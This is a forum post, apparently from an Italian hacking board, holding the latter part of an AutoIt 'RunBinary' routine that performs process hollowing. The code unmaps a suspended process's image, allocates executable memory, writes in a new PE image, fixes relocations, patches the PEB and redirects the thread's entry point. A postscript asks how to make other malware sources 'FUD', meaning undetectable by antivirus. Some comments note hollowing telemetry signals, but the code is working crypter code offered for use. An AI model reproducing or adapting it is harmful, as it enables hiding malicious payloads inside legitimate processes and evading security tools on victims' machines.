           ; Skip directories 5-15 (11 x 8 bytes) to reach the section headers.
           $ppointer += 88
           #region 6. ALLOCATE 'NEW' MEMORY SPACE
           ; Relocatable image: try any address first, then the preferred base, then unmap the
           ; host's own image from its base and retry. Non-relocatable: preferred base only,
           ; unmapping the host image if needed.
           Local $frelocate
           Local $pzeropoint
           If $frelocatable Then
                   $pzeropoint = _runbinary_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
                   If @error Then
                           $pzeropoint = _runbinary_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
                           If @error Then
                                   _runbinary_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
                                   $pzeropoint = _runbinary_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
                                   If @error Then
                                           DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                                           Return SetError(101, 1, 0)
                                   EndIf
                           EndIf
                   EndIf
                   $frelocate = True
           Else
                   $pzeropoint = _runbinary_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
                   If @error Then
                           _runbinary_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
                           $pzeropoint = _runbinary_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
                           If @error Then
                                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                                   Return SetError(101, 0, 0)
                           EndIf
                   EndIf
           EndIf
           ; Rewrite ImageBase in the (local copy of the) header to the address actually obtained.
           DllStructSetData($timage_optional_header, "ImageBase", $pzeropoint)
           #region 7. CONSTRUCT THE NEW MODULE
           ; Build the mapped image locally: headers first, then each section at its RVA.
           Local $tmodule = DllStructCreate("byte[" & $ioptionalheadersizeofimagenew & "]")
           Local $pmodule = DllStructGetPtr($tmodule)
           Local $theaders = DllStructCreate("byte[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
           DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
           Local $timage_section_header
           Local $isizeofrawdata, $ppointertorawdata
           Local $ivirtualaddress, $ivirtualsize
           Local $trelocraw
           For $I = 1 To $inumberofsections
                   $timage_section_header = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "word NumberOfRelocations;" & "word NumberOfLinenumbers;" & "dword Characteristics", $ppointer)
                   $isizeofrawdata = DllStructGetData($timage_section_header, "SizeOfRawData")
                   $ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "PointerToRawData")
                   $ivirtualaddress = DllStructGetData($timage_section_header, "VirtualAddress")
                   $ivirtualsize = DllStructGetData($timage_section_header, "UnionOfVirtualSizeAndPhysicalAddress")
                   ; Copy min(VirtualSize, SizeOfRawData) bytes; no check that RVA+size fits SizeOfImage.
                   If $ivirtualsize And $ivirtualsize < $isizeofrawdata Then $isizeofrawdata = $ivirtualsize
                   If $isizeofrawdata Then
                           DllStructSetData(DllStructCreate("byte[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("byte[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
                   EndIf
                   ; Remember where the .reloc data lives in the raw file for _runbinary_fixreloc.
                   If $frelocate Then
                           If $ivirtualaddress <= $paddressnewbasereloc And $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc Then
                                   $trelocraw = DllStructCreate("byte[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
                           EndIf
                   EndIf
                   $ppointer += 40
           Next
           If $frelocate Then _runbinary_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
           ; Whole mapped image written into the child in one call.
           $aCall = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $hprocess, "ptr", $pzeropoint, "ptr", $pmodule, "dword_ptr", $ioptionalheadersizeofimagenew, "dword_ptr*", 0)
           If @error Or Not $aCall[0] Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(7, 0, 0)
           EndIf
           #region 8. PEB ImageBaseAddress MANIPULATION
           ; Read the child's PEB, overwrite ImageBaseAddress with the new image, write it back.
           ; The struct below is a fixed layout (dword-sized fields after the first ptrs), so it
           ; is only byte-accurate up to ImageBaseAddress, which is all that is modified.
           Local $tpeb = DllStructCreate("byte InheritedAddressSpace;" & "byte ReadImageFileExecOptions;" & "byte BeingDebugged;" & "byte Spare;" & "ptr Mutant;" & "ptr ImageBaseAddress;" & "ptr LoaderData;" & "ptr ProcessParameters;" & "ptr SubSystemData;" & "ptr ProcessHeap;" & "ptr FastPebLock;" & "ptr FastPebLockRoutine;" & "ptr FastPebUnlockRoutine;" & "dword EnvironmentUpdateCount;" & "ptr KernelCallbackTable;" & "ptr EventLogSection;" & "ptr EventLog;" & "ptr FreeList;" & "dword TlsExpansionCounter;" & "ptr TlsBitmap;" & "dword TlsBitmapBits[2];" & "ptr ReadOnlySharedMemoryBase;" & "ptr ReadOnlySharedMemoryHeap;" & "ptr ReadOnlyStaticServerData;" & "ptr AnsiCodePageData;" & "ptr OemCodePageData;" & "ptr UnicodeCaseTableData;" & "dword NumberOfProcessors;" & "dword NtGlobalFlag;" & "byte Spare2[4];" & "int64 CriticalSectionTimeout;" & "dword HeapSegmentReserve;" & "dword HeapSegmentCommit;" & "dword HeapDeCommitTotalFreeThreshold;" & "dword HeapDeCommitFreeBlockThreshold;" & "dword NumberOfHeaps;" & "dword MaximumNumberOfHeaps;" & "ptr ProcessHeaps;" & "ptr GdiSharedHandleTable;" & "ptr ProcessStarterHelper;" & "ptr GdiDCAttributeList;" & "ptr LoaderLock;" & "dword OSMajorVersion;" & "dword OSMinorVersion;" & "dword OSBuildNumber;" & "dword OSPlatformId;" & "dword ImageSubSystem;" & "dword ImageSubSystemMajorVersion;" & "dword ImageSubSystemMinorVersion;" & "dword GdiHandleBuffer[34];" & "dword PostProcessInitRoutine;" & "dword TlsExpansionBitmap;" & "byte TlsExpansionBitmapBits[128];" & "dword SessionId")
           $aCall = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "ptr", $hprocess, "ptr", $ppeb, "ptr", DllStructGetPtr($tpeb), "dword_ptr", DllStructGetSize($tpeb), "dword_ptr*", 0)
           If @error Or Not $aCall[0] Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(8, 0, 0)
           EndIf
           DllStructSetData($tpeb, "ImageBaseAddress", $pzeropoint)
           $aCall = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $hprocess, "ptr", $ppeb, "ptr", DllStructGetPtr($tpeb), "dword_ptr", DllStructGetSize($tpeb), "dword_ptr*", 0)
           If @error Or Not $aCall[0] Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(9, 0, 0)
           EndIf
           #region 9. NEW ENTRY POINT
           ; The initial thread's Eax (x86) / Rcx (x64) is set to the new entry point; the
           ; loader's thread-start stub jumps there once the thread resumes.
           Switch $irunflag
                   Case 1
                           DllStructSetData($tcontext, "Eax", $pzeropoint + $ientrypointnew)
                   Case 2
                           DllStructSetData($tcontext, "Rcx", $pzeropoint + $ientrypointnew)
                   Case 3
           EndSwitch
           #region 10. SET NEW CONTEXT
           $aCall = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $hThread, "ptr", DllStructGetPtr($tcontext))
           If @error Or Not $aCall[0] Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(10, 0, 0)
           EndIf
           #region 11. RESUME THREAD
           $aCall = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $hThread)
           If @error Or $aCall[0] = -1 Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(11, 0, 0)
           EndIf
           #region 12. CLOSE OPEN HANDLES AND RETURN PID
           ; Handles are only closed on the success path; failure paths above leak them
           ; (the process has been terminated, so this is cosmetic).
           DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hprocess)
           DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hThread)
           Return DllStructGetData($tprocess_information, "ProcessId")
    EndFunc   ;==>runbinary
    ; Applies base relocations to the locally built image at $pmodule.
    ; $tData = struct over the raw .reloc data, $paddressnew/$paddressold = actual and
    ; preferred image base, $fimagex64 = True for PE32+. Only one relocation type is
    ; patched: 3 (IMAGE_REL_BASED_HIGHLOW) for x86, 3 + 7 = 10 (IMAGE_REL_BASED_DIR64) for
    ; x64; every other type, including the ABSOLUTE padding entries, is skipped.
    ; Each patched slot is read/written as a native "ptr", so the write width follows the
    ; interpreter's bitness (which runbinary has already matched to the image).
    ; Note: $irelativemove starts uninitialised (empty -> 0 in the comparison) and a block
    ; with SizeOfBlock = 0 would loop forever; no sanity check on the reloc data.
    Func _runbinary_fixreloc($pmodule, $tData, $paddressnew, $paddressold, $fimagex64)
           Local $idelta = $paddressnew - $paddressold
           Local $iSize = DllStructGetSize($tData)
           Local $pdata = DllStructGetPtr($tData)
           Local $timage_base_relocation, $irelativemove
           Local $ivirtualaddress, $isizeofblock, $inumberofentries
           Local $tenries, $idata, $taddress
           Local $iflag = 3 + 7 * $fimagex64
           While $irelativemove < $iSize
                   ; IMAGE_BASE_RELOCATION header, followed by (SizeOfBlock - 8) / 2 WORD entries.
                   $timage_base_relocation = DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $pdata + $irelativemove)
                   $ivirtualaddress = DllStructGetData($timage_base_relocation, "VirtualAddress")
                   $isizeofblock = DllStructGetData($timage_base_relocation, "SizeOfBlock")
                   $inumberofentries = ($isizeofblock - 8) / 2
                   $tenries = DllStructCreate("word[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
                   For $I = 1 To $inumberofentries
                           $idata = DllStructGetData($tenries, 1, $I)
                           ; Entry = type (high 4 bits) | offset within the 4 KiB page (low 12 bits).
                           If BitShift($idata, 12) = $iflag Then
                                   $taddress = DllStructCreate("ptr", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
                                   DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
                           EndIf
                   Next
                   $irelativemove += $isizeofblock
           WEnd
           Return 1
    EndFunc   ;==>_runbinary_fixreloc
    ; VirtualAllocEx at a fixed address $paddress in $hprocess, $iSize bytes, protection
    ; 64 = PAGE_EXECUTE_READWRITE. First tries 4096 = MEM_COMMIT (works if the range is
    ; already reserved), then 12288 = MEM_COMMIT | MEM_RESERVE. Returns the base address
    ; or 0 with @error 1. An RWX allocation in a freshly created suspended process is a
    ; strong hollowing indicator.
    Func _runbinary_allocateexespaceataddress($hprocess, $paddress, $iSize)
           Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $hprocess, "ptr", $paddress, "dword_ptr", $iSize, "dword", 4096, "dword", 64)
           If @error Or Not $aCall[0] Then
                   $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $hprocess, "ptr", $paddress, "dword_ptr", $iSize, "dword", 12288, "dword", 64)
                   If @error Or Not $aCall[0] Then Return SetError(1, 0, 0)
           EndIf
           Return $aCall[0]
    EndFunc   ;==>_runbinary_allocateexespaceataddress
    ; VirtualAllocEx at any address (lpAddress = 0) in $hprocess, $iSize bytes,
    ; 12288 = MEM_COMMIT | MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE.
    ; Returns the base address, or 0 with @error 1 on failure.
    Func _runbinary_allocateexespace($hprocess, $iSize)
           Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $hprocess, "ptr", 0, "dword_ptr", $iSize, "dword", 12288, "dword", 64)
           If @error Or Not $aCall[0] Then Return SetError(1, 0, 0)
           Return $aCall[0]
    EndFunc   ;==>_runbinary_allocateexespace
    ; Calls ntdll!NtUnmapViewOfSection to evict the host's own image mapped at $paddress,
    ; freeing that range for the payload. The NTSTATUS is discarded; only a DllCall failure
    ; sets @error. NtUnmapViewOfSection on a just-created suspended child is a classic
    ; process-hollowing telemetry signal.
    Func _runbinary_unmapviewofsection($hprocess, $paddress)
           DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $hprocess, "ptr", $paddress)
           If @error Then Return SetError(1, 0, 0)
           Return 1
    EndFunc   ;==>_runbinary_unmapviewofsection
    ; Wrapper for kernel32!IsWow64Process: returns the out-parameter (nonzero when
    ; $hprocess is a 32-bit process running under WOW64), or 0 with @error 1 if the
    ; call fails. Used by runbinary to refuse a bitness mismatch.
    Func _runbinary_iswow64process($hprocess)
           Local $aCall = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $hprocess, "bool*", 0)
           If @error Or Not $aCall[0] Then Return SetError(1, 0, 0)
           Return $aCall[2]
    EndFunc   ;==>_runbinary_iswow64process


    P.S. Ho anche delle source in C, C++ e altri linguaggi. Sono facili da trovare in rete lo so ma vorrei capire come refuddarli please.
     
    .
0 replies since 16/9/2013, 01:56   296 views
  Share  
.
Top